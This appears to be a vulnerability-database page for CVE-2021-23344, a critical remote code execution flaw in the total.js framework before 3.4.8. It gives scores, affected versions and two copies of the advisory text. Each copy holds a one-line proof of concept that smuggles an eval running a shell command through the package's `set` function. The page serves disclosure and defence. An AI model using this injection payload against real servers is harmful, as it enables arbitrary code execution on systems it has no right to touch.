CVE-2021-23344
published 2021-03-04CVE-2021-23344: The package total.js before 3.4.8 are vulnerable to Remote Code Execution (RCE) via set.
PriorityP357critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
4.79%
90.8th percentile
The package total.js before 3.4.8 are vulnerable to Remote Code Execution (RCE) via set.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| totaljs | total.js | < 3.4.8 | 3.4.8 |
| totaljs | total.js | >= 0 < 3.4.8 | 3.4.8 |
| totaljs | total.js | >= unspecified < 3.4.8 | 3.4.8 |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
total.js Remote Code Execution Vulnerability
osv·2021-03-19
CVE-2021-23344 [CRITICAL] total.js Remote Code Execution Vulnerability
total.js Remote Code Execution Vulnerability
total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
### PoC
```js
// To be run in a nodejs console:
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')
```
GHSA
total.js Remote Code Execution Vulnerability
ghsa·2021-03-19
CVE-2021-23344 [CRITICAL] CWE-94 total.js Remote Code Execution Vulnerability
total.js Remote Code Execution Vulnerability
total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
### PoC
```js
// To be run in a nodejs console:
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')
```
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2021-03-04
Published